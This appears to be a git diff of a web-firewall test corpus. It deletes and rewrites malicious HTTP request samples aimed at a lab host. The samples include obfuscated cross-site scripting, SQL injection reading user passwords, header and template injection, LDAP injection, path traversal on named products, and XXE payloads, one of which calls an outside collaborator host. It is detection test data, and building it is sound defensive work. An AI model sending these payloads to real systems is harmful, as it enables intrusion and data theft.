diff --git a/testcases/0b/ce/25d5adbf0c39bf88f812f098977e.black b/testcases/0b/ce/25d5adbf0c39bf88f812f098977e.black
deleted file mode 100644
index 50bb25a43..000000000
--- a/testcases/0b/ce/25d5adbf0c39bf88f812f098977e.black
+++ /dev/null
@@ -1,10 +0,0 @@
-GET /vulnerabilities/xss_r/?name= HTTP/1.1
-Host: 10.10.3.128:2280
-Upgrade-Insecure-Requests: 1
-User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
-Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
-Referer: http://10.10.3.128:2280/vulnerabilities/xss_r/?name=globalThis%5B%27%5Cu%7B0061%7D%5Cu%7B006c%7D%5Cu%7B0065%7D%5Cu%7B0072%7D%5Cu%7B0074%7D%27%5D%28%27%5Cu%7B0058%7D%5Cu%7B0053%7D%5Cu%7B0053%7D%27%29%3B%2F%2F
-Accept-Encoding: gzip, deflate
-Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
-Connection: close
-
diff --git a/testcases/0c/47/fde93b5ba630b5110a38819b61f6.black b/testcases/0c/47/fde93b5ba630b5110a38819b61f6.black
deleted file mode 100644
index ef38ab421..000000000
--- a/testcases/0c/47/fde93b5ba630b5110a38819b61f6.black
+++ /dev/null
@@ -1,10 +0,0 @@
-GET /vulnerabilities/xss_r/?name= HTTP/1.1
-Host: 10.10.3.128:2280
-Upgrade-Insecure-Requests: 1
-User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
-Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
-Referer: http://10.10.3.128:2280/vulnerabilities/xss_r/?name=self%5B%27%5Cx65%5Cx76%5Cx61%5Cx6c%27%5D%28%27self%5B%22%5Cx61%5Cx6c%5Cx65%5Cx72%5Cx74%22%5D%28self%5B%22%5Cx61%5Cx74%5Cx6f%5Cx62%22%5D%28%22WFNT%22%29%29%27%29%3B%2F%2F
-Accept-Encoding: gzip, deflate
-Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
-Connection: close
-
diff --git a/testcases/0c/4e/f7020e286f9fac38d53f41a0fc46.black b/testcases/0c/4e/f7020e286f9fac38d53f41a0fc46.black
deleted file mode 100644
index 1d8928aac..000000000
--- a/testcases/0c/4e/f7020e286f9fac38d53f41a0fc46.black
+++ /dev/null
@@ -1,15 +0,0 @@
-POST /vulnerabilities/exec/ HTTP/1.1
-Host: 10.10.3.128:2280
-Content-Length: 19
-Cache-Control: max-age=0
-Upgrade-Insecure-Requests: 1
-Origin: http://10.10.3.128:2280
-Content-Type: application/x-www-form-urlencoded
-User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
-Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
-Referer: http://10.10.3.128:2280/vulnerabilities/exec/
-Accept-Encoding: gzip, deflate
-Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
-Connection: close
-
-ip=11&Submit=Submit
\ No newline at end of file
diff --git a/testcases/0d/8e/88e8eeb6a289d5704818622a124a.black b/testcases/0d/8e/88e8eeb6a289d5704818622a124a.black
deleted file mode 100644
index c23986452..000000000
--- a/testcases/0d/8e/88e8eeb6a289d5704818622a124a.black
+++ /dev/null
@@ -1,10 +0,0 @@
-GET /vulnerabilities/xss_r/?name= HTTP/1.1
-Host: 10.10.3.128:2280
-Upgrade-Insecure-Requests: 1
-User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
-Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
-Referer: http://10.10.3.128:2280/vulnerabilities/xss_r/?name=top%5B%28%2B%7B%7D%2B%5B%5D%29%5B%2B%21%21%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%21%5B%5D%5D%2B%28%5B%5D%5B%5B%5D%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%21%5B%5D%2B%21%21%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%21%21%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%28%28%2B%7B%7D%2B%5B%5D%29%5B%2B%21%21%5B%5D%5D%29%3B%2F%2F
-Accept-Encoding: gzip, deflate
-Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
-Connection: close
-
diff --git a/testcases/10/d2/f38cdacc52aeed18e69cf93bf207.black b/testcases/10/d2/f38cdacc52aeed18e69cf93bf207.black
deleted file mode 100644
index 05e0f2d84..000000000
--- a/testcases/10/d2/f38cdacc52aeed18e69cf93bf207.black
+++ /dev/null
@@ -1,12 +0,0 @@
-GET /vulnerabilities/xss_r/?name= HTTP/1.1
-Host: 10.10.3.128:2280
-Pragma: no-cache
-Cache-Control: no-cache
-Upgrade-Insecure-Requests: 1
-User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
-Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
-Referer: http://10.10.3.128:2280/vulnerabilities/xss_r/?name=%3Cobject+width%3D500+height%3D500+type%3Dtext%2Fhtml%3E%3Cparam+name%3Durl+value%3Dhttps%3A%2F%2Fportswigger-labs.net%3E
-Accept-Encoding: gzip, deflate
-Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
-Connection: close
-
diff --git a/testcases/17/86/aa1a2f33f0c343e2d7b051093456.black b/testcases/17/86/aa1a2f33f0c343e2d7b051093456.black
deleted file mode 100644
index b6adf151d..000000000
--- a/testcases/17/86/aa1a2f33f0c343e2d7b051093456.black
+++ /dev/null
@@ -1,10 +0,0 @@
-GET /vulnerabilities/sqli/?id=&Submit=Submit HTTP/1.1
-Host: 10.10.3.128:2280
-Upgrade-Insecure-Requests: 1
-User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
-Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
-Referer: http://10.10.3.128:2280/vulnerabilities/sqli/?id=%7B%22id%22%3A%22MSBhbmQgMT0yIHNlbGVjdCB2ZXJzaW9uKCkgLS0%3D%22%7D&Submit=Submit
-Accept-Encoding: gzip, deflate
-Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
-Connection: close
-
diff --git a/testcases/20/a7/74d2c5ff9626c6a6f0bfc996dcfb.black b/testcases/20/a7/74d2c5ff9626c6a6f0bfc996dcfb.black
deleted file mode 100644
index 74b909f0a..000000000
--- a/testcases/20/a7/74d2c5ff9626c6a6f0bfc996dcfb.black
+++ /dev/null
@@ -1,10 +0,0 @@
-GET /vulnerabilities/xss_r/?name= HTTP/1.1
-Host: 10.10.3.128:2280
-Upgrade-Insecure-Requests: 1
-User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
-Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
-Referer: http://10.10.3.128:2280/vulnerabilities/xss_r/?name=window%5B%27%5Cu%7B0061%7D%5Cu%7B006c%7D%5Cu%7B0065%7D%5Cu%7B0072%7D%5Cu%7B0074%7D%27%5D%28%27%5Cu%7B0058%7D%5Cu%7B0053%7D%5Cu%7B0053%7D%27%29%3B%2F%2F
-Accept-Encoding: gzip, deflate
-Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
-Connection: close
-
diff --git a/testcases/27/de/481d8a020392df69acdb7d2ced20.black b/testcases/27/de/481d8a020392df69acdb7d2ced20.black
deleted file mode 100644
index 904ff5d8e..000000000
--- a/testcases/27/de/481d8a020392df69acdb7d2ced20.black
+++ /dev/null
@@ -1,10 +0,0 @@
-GET /vulnerabilities/xss_r/?name= HTTP/1.1
-Host: 10.10.3.128:2280
-Upgrade-Insecure-Requests: 1
-User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
-Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
-Referer: http://10.10.3.128:2280/vulnerabilities/xss_r/?name=%C0%BCscript%3Ealert(1)%3C/script%3E%E0%80%BCscript%3Ealert(1)%3C/script%3E%F0%80%80%BCscript%3Ealert(1)%3C/script%3E%F8%80%80%80%BCscript%3Ealert(1)%3C/script%3E%FC%80%80%80%80%BCscript%3Ealert(1)%3C/script%3E
-Accept-Encoding: gzip, deflate
-Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
-Connection: close
-
diff --git a/testcases/2a/11/7acb7e70015cb0c6f554d8b5dc2b.black b/testcases/2a/11/7acb7e70015cb0c6f554d8b5dc2b.black
deleted file mode 100644
index eedd7956f..000000000
--- a/testcases/2a/11/7acb7e70015cb0c6f554d8b5dc2b.black
+++ /dev/null
@@ -1,10 +0,0 @@
-GET /vulnerabilities/sqli/?id=&Submit=Submit HTTP/1.1
-Host: 10.10.3.128:2280
-Upgrade-Insecure-Requests: 1
-User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
-Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
-Referer: http://10.10.3.128:2280/vulnerabilities/sqli/?id=%3CstoreId%3E%26%2349%3B%26%2332%3B%26%2385%3B%26%2378%3B%26%2373%3B%26%2379%3B%26%2378%3B%26%2332%3B%26%2383%3B%26%2369%3B%26%2376%3B%26%2369%3B%26%2367%3B%26%2384%3B%26%2332%3B%26%23117%3B%26%23115%3B%26%23101%3B%26%23114%3B%26%23110%3B%26%2397%3B%26%23109%3B%26%23101%3B%26%2332%3B%26%23124%3B%26%23124%3B%26%2332%3B%26%2339%3B%26%23126%3B%26%2339%3B%26%2332%3B%26%23124%3B%26%23124%3B%26%2332%3B%26%23112%3B%26%2397%3B%26%23115%3B%26%23115%3B%26%23119%3B%26%23111%3B%26%23114%3B%26%23100%3B%26%2332%3B%26%2370%3B%26%2382%3B%26%2379%3B%26%2377%3B%26%2332%3B%26%23117%3B%26%23115%3B%26%23101%3B%26%23114%3B%26%23115%3B%3C%2FstoreId%3E&Submit=Submit
-Accept-Encoding: gzip, deflate
-Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
-Connection: close
-
diff --git a/testcases/2b/4c/fea2215581c39d6f6e2714804bc6.black b/testcases/2b/4c/fea2215581c39d6f6e2714804bc6.black
deleted file mode 100644
index 6174c3a91..000000000
--- a/testcases/2b/4c/fea2215581c39d6f6e2714804bc6.black
+++ /dev/null
@@ -1,10 +0,0 @@
-GET /vulnerabilities/xss_r/?name= HTTP/1.1
-Host: 10.10.3.128:2280
-Cache-Control: max-age=0
-Upgrade-Insecure-Requests: 1
-User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
-Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
-Accept-Encoding: gzip, deflate
-Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
-Connection: close
-
diff --git a/testcases/2e/13/319afe1fd18239d70b5efced1cdf.black b/testcases/2e/13/319afe1fd18239d70b5efced1cdf.black
deleted file mode 100644
index 24bd21a4e..000000000
--- a/testcases/2e/13/319afe1fd18239d70b5efced1cdf.black
+++ /dev/null
@@ -1,11 +0,0 @@
-GET /minio/bootstrap/v1/verify HTTP/1.1
-Host: 10.10.3.128:8080
-Pragma: no-cache
-Cache-Control: no-cache
-Upgrade-Insecure-Requests: 1
-User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
-Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
-Accept-Encoding: gzip, deflate
-Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
-Connection: close
-
diff --git a/testcases/30/60/992b9332907e7ad36168cee03305.black b/testcases/30/60/992b9332907e7ad36168cee03305.black
deleted file mode 100644
index d6b59f3cf..000000000
--- a/testcases/30/60/992b9332907e7ad36168cee03305.black
+++ /dev/null
@@ -1,10 +0,0 @@
-GET /vulnerabilities/xss_r/?name= HTTP/1.1
-Host: 10.10.3.128:2280
-Upgrade-Insecure-Requests: 1
-User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
-Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
-Referer: http://10.10.3.128:2280/vulnerabilities/xss_r/?name=parent%5B%28%2B%7B%7D%2B%5B%5D%29%5B%2B%21%21%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%21%5B%5D%5D%2B%28%5B%5D%5B%5B%5D%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%21%5B%5D%2B%21%21%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%21%21%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%28%28%2B%7B%7D%2B%5B%5D%29%5B%2B%21%21%5B%5D%5D%29%3B%2F%2F
-Accept-Encoding: gzip, deflate
-Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
-Connection: close
-
diff --git a/testcases/31/95/bbd21aed9c6d944ba22e623a9a0d.black b/testcases/31/95/bbd21aed9c6d944ba22e623a9a0d.black
deleted file mode 100644
index 5fee5889d..000000000
--- a/testcases/31/95/bbd21aed9c6d944ba22e623a9a0d.black
+++ /dev/null
@@ -1,10 +0,0 @@
-GET /vulnerabilities/xss_r/?name= HTTP/1.1
-Host: 10.10.3.128:2280
-Upgrade-Insecure-Requests: 1
-User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
-Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
-Referer: http://10.10.3.128:2280/vulnerabilities/xss_r/?name=self%5B%27%5Cu%7B0061%7D%5Cu%7B006c%7D%5Cu%7B0065%7D%5Cu%7B0072%7D%5Cu%7B0074%7D%27%5D%28%27%5Cu%7B0058%7D%5Cu%7B0053%7D%5Cu%7B0053%7D%27%29%3B%2F%2F
-Accept-Encoding: gzip, deflate
-Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
-Connection: close
-
diff --git a/testcases/34/b7/572a6ebd86e9664bf33f5aaee155.black b/testcases/34/b7/572a6ebd86e9664bf33f5aaee155.black
index 40a3fd715..cf140f095 100644
--- a/testcases/34/b7/572a6ebd86e9664bf33f5aaee155.black
+++ b/testcases/34/b7/572a6ebd86e9664bf33f5aaee155.black
@@ -1,9 +1,8 @@
-GET /vulnerabilities/xss_r/?name= HTTP/1.1
+GET /vulnerabilities/xss_r/?name={{43426*%2741827%27}} HTTP/1.1
 Host: 10.10.3.128:2280
 Upgrade-Insecure-Requests: 1
 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
-Referer: http://10.10.3.128:2280/vulnerabilities/xss_r/?name=frames%5B%2F*foo*%2F%27alert%27%2F*bar*%2F%5D%28frames%5B%2F*foo*%2F%27document%27%2F*bar*%2F%5D%5B%27domain%27%5D%29%3B%2F%2F
 Accept-Encoding: gzip, deflate
 Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
 Connection: close
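Review bot: The 34/b7 test case is rewritten in place under an unchanged path, and that path has the shape of a 32-hex-digit digest split 2/2/28, so if the corpus is content-addressed the file name stops matching the file's bytes after this change. The same holds for every other in-place rewrite in this commit (38/a9, 38/df, 39/c8, 3f/aa and the ones after them). If the names are meant to be digests, add each new request as a new file under its own digest and delete the old one; if they are opaque IDs, a line in the corpus README saying so would keep tooling from treating them as checksums.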
diff --git a/testcases/38/a9/2862fec989c7d7b2e61ea58b543b.black b/testcases/38/a9/2862fec989c7d7b2e61ea58b543b.black
index 39db62d55..7ff613161 100644
--- a/testcases/38/a9/2862fec989c7d7b2e61ea58b543b.black
+++ b/testcases/38/a9/2862fec989c7d7b2e61ea58b543b.black
@@ -1,4 +1,4 @@
-GET /vulnerabilities/sqli/?id=&Submit=Submit HTTP/1.1
+GET /vulnerabilities/sqli/%0D%0AX-Pen-Test%3AeKqNz22M6K HTTP/1.1
 Host: 10.10.3.128:2280
 Upgrade-Insecure-Requests: 1
 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
diff --git a/testcases/38/df/260eb82e55c9eea40b5f85eab86d.black b/testcases/38/df/260eb82e55c9eea40b5f85eab86d.black
index 820377157..68a0c0f6b 100644
--- a/testcases/38/df/260eb82e55c9eea40b5f85eab86d.black
+++ b/testcases/38/df/260eb82e55c9eea40b5f85eab86d.black
@@ -1,9 +1,8 @@
-GET /vulnerabilities/xss_r/?name= HTTP/1.1
+GET /actions/seomatic/meta-container/meta-link-container/?uri={{228*%2798%27}} HTTP/1.1
 Host: 10.10.3.128:2280
 Upgrade-Insecure-Requests: 1
 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
-Referer: http://10.10.3.128:2280/vulnerabilities/xss_r/?name=parent%5B%27%5Cx61%5Cx6c%5Cx65%5Cx72%5Cx74%27%5D%28parent%5B%27%5Cx64%5Cx6f%5Cx63%5Cx75%5Cx6d%5Cx65%5Cx6e%5Cx74%27%5D%5B%27%5Cx64%5Cx6f%5Cx6d%5Cx61%5Cx69%5Cx6e%27%5D%29%3B%2F%2F
 Accept-Encoding: gzip, deflate
 Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
 Connection: close
diff --git a/testcases/39/c8/02d0e455150d0f08ee46787354ca.black b/testcases/39/c8/02d0e455150d0f08ee46787354ca.black
index d3dd11602..b166492bf 100644
--- a/testcases/39/c8/02d0e455150d0f08ee46787354ca.black
+++ b/testcases/39/c8/02d0e455150d0f08ee46787354ca.black
@@ -1,4 +1,4 @@
-GET /%2e/WEB-INF/web.xml HTTP/1.1
+GET /audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=admin HTTP/1.1
 Host: 10.10.3.128
 Pragma: no-cache
 Cache-Control: no-cache
diff --git a/testcases/3f/aa/9095c933141c59546faccf703b75.black b/testcases/3f/aa/9095c933141c59546faccf703b75.black
index 57fcd39a8..ea1058187 100644
--- a/testcases/3f/aa/9095c933141c59546faccf703b75.black
+++ b/testcases/3f/aa/9095c933141c59546faccf703b75.black
@@ -1,9 +1,8 @@
-GET /vulnerabilities/xss_r/?name= HTTP/1.1
+GET /api/products/123%20and%201=1/reviews?page=2&size=10&sort=time HTTP/1.1
 Host: 10.10.3.128:2280
 Upgrade-Insecure-Requests: 1
 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
-Referer: http://10.10.3.128:2280/vulnerabilities/xss_r/?name=a%3D%27constructor%27%3Bb%3D%7B%7D%3Ba.sub.call.call%28b%5Ba%5D.getOwnPropertyDescriptor%28b%5Ba%5D.getPrototypeOf%28a.sub%29%2Ca%29.value%2C0%2C%27alert%281%29%27%29%28%29
 Accept-Encoding: gzip, deflate
 Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
 Connection: close
diff --git a/testcases/40/9f/a3f8b55ef516ace9ce5b6bd92bb2.black b/testcases/40/9f/a3f8b55ef516ace9ce5b6bd92bb2.black
index 766b3e66c..c21d2f597 100644
--- a/testcases/40/9f/a3f8b55ef516ace9ce5b6bd92bb2.black
+++ b/testcases/40/9f/a3f8b55ef516ace9ce5b6bd92bb2.black
@@ -1,9 +1,8 @@
-GET /vulnerabilities/xss_r/?name= HTTP/1.1
+GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/test HTTP/1.1
 Host: 10.10.3.128:2280
 Upgrade-Insecure-Requests: 1
 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
-Referer: http://10.10.3.128:2280/vulnerabilities/xss_r/?name=globalThis%5B%27ale%27%2B%27rt%27%5D%28globalThis%5B%27doc%27%2B%27ument%27%5D%5B%27dom%27%2B%27ain%27%5D%29%3B%2F%2F
 Accept-Encoding: gzip, deflate
 Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
 Connection: close
diff --git a/testcases/45/c7/2b314c34e964921340f35ddb048d.black b/testcases/45/c7/2b314c34e964921340f35ddb048d.black
index 31f97492d..78bbb5c01 100644
--- a/testcases/45/c7/2b314c34e964921340f35ddb048d.black
+++ b/testcases/45/c7/2b314c34e964921340f35ddb048d.black
@@ -1,9 +1,8 @@
-GET /vulnerabilities/xss_r/?name= HTTP/1.1
+GET /%2bCSCOT%2b/translation-table?default-language&lang=../&textdomain=/%2bCSCOE%2b/portal_inc.lua&type=mst HTTP/1.1
 Host: 10.10.3.128:2280
 Upgrade-Insecure-Requests: 1
 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
-Referer: http://10.10.3.128:2280/vulnerabilities/xss_r/?name=%3C%21DOCTYPE+stockCheck+%5B%3C%21ENTITY+%25+xxe+SYSTEM+%22http%3A%2F%2FBURP-COLLABORATOR-SUBDOMAIN%22%3E+%25xxe%3B+%5D%3E
 Accept-Encoding: gzip, deflate
 Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
 Connection: close
diff --git a/testcases/46/91/c0fc989e4cf0766cf35af2f22c1a.black b/testcases/46/91/c0fc989e4cf0766cf35af2f22c1a.black
index 2670f13a8..2902972ab 100644
--- a/testcases/46/91/c0fc989e4cf0766cf35af2f22c1a.black
+++ b/testcases/46/91/c0fc989e4cf0766cf35af2f22c1a.black
@@ -1,9 +1,8 @@
-GET /vulnerabilities/xss_r/?name= HTTP/1.1
+GET /?paramd6f70e=admin%2A%29%28%28%7Cuserpassword=%2A%29 HTTP/1.1
 Host: 10.10.3.128:2280
 Upgrade-Insecure-Requests: 1
 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
-Referer: http://10.10.3.128:2280/vulnerabilities/xss_r/?name=frames%5B%27%5Cx65%5Cx76%5Cx61%5Cx6c%27%5D%28%27frames%5B%22%5Cx61%5Cx6c%5Cx65%5Cx72%5Cx74%22%5D%28frames%5B%22%5Cx61%5Cx74%5Cx6f%5Cx62%22%5D%28%22WFNT%22%29%29%27%29%3B%2F%2F
 Accept-Encoding: gzip, deflate
 Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
 Connection: close
diff --git a/testcases/47/0b/90f8073eb0c860827befd43c8bd9.black b/testcases/47/0b/90f8073eb0c860827befd43c8bd9.black
index a9289037c..0a25e8881 100644
--- a/testcases/47/0b/90f8073eb0c860827befd43c8bd9.black
+++ b/testcases/47/0b/90f8073eb0c860827befd43c8bd9.black
@@ -1,9 +1,8 @@
-GET /vulnerabilities/xss_r/?name= HTTP/1.1
+GET /?param25f07d=%2A%29%28uid=%2A%29%29%28%7C%28uid=%2A HTTP/1.1
 Host: 10.10.3.128:2280
 Upgrade-Insecure-Requests: 1
 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
-Referer: http://10.10.3.128:2280/vulnerabilities/xss_r/?name=globalThis%5B%28%2B%7B%7D%2B%5B%5D%29%5B%2B%21%21%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%21%5B%5D%5D%2B%28%5B%5D%5B%5B%5D%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%21%5B%5D%2B%21%21%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%21%21%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%28%28%2B%7B%7D%2B%5B%5D%29%5B%2B%21%21%5B%5D%5D%29%3B%2F%2F
 Accept-Encoding: gzip, deflate
 Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
 Connection: close
diff --git a/testcases/47/e8/60f3f244ef8fb130a8e7fe597184.black b/testcases/47/e8/60f3f244ef8fb130a8e7fe597184.black
index 22f3edabe..ac94790e3 100644
--- a/testcases/47/e8/60f3f244ef8fb130a8e7fe597184.black
+++ b/testcases/47/e8/60f3f244ef8fb130a8e7fe597184.black
@@ -1,9 +1,8 @@
-GET /vulnerabilities/xss_r/?name= HTTP/1.1
+GET /uploadfiles/apache.php.jpeg HTTP/1.1
 Host: 10.10.3.128:2280
 Upgrade-Insecure-Requests: 1
 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
-Referer: http://10.10.3.128:2280/vulnerabilities/xss_r/?name=%3Cfoo+xmlns%3Axi%3D%22http%3A%2F%2Fwww.w3.org%2F2001%2FXInclude%22%3E%3Cxi%3Ainclude+parse%3D%22text%22+href%3D%22file%3A%2F%2F%2Fetc%2Fhostname%22%2F%3E%3C%2Ffoo%3E
 Accept-Encoding: gzip, deflate
 Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
 Connection: close
diff --git a/testcases/49/e6/139ab3f16b618041e5a61f513c61.black b/testcases/49/e6/139ab3f16b618041e5a61f513c61.black
index 401d36e3e..96467d352 100644
--- a/testcases/49/e6/139ab3f16b618041e5a61f513c61.black
+++ b/testcases/49/e6/139ab3f16b618041e5a61f513c61.black
@@ -1,4 +1,4 @@
-GET /pages/createpage.action?spaceKey=EX&src=quick-create&queryString=%5cu0027%2b%7b233*233%7d%2b%5cu0027 HTTP/1.1
+GET /admin/?a=doSearchParameter&appno=0+union+select+43512*43017,1--+&c=language_general&editor=cn&n=language&site=admin&word=search HTTP/1.1
 Host: 10.10.3.128
 Pragma: no-cache
 Cache-Control: no-cache
diff --git a/testcases/4a/16/3e3624055a6de89cc8ea750df30a.black b/testcases/4a/16/3e3624055a6de89cc8ea750df30a.black
index 9de25f768..717c08ee2 100644
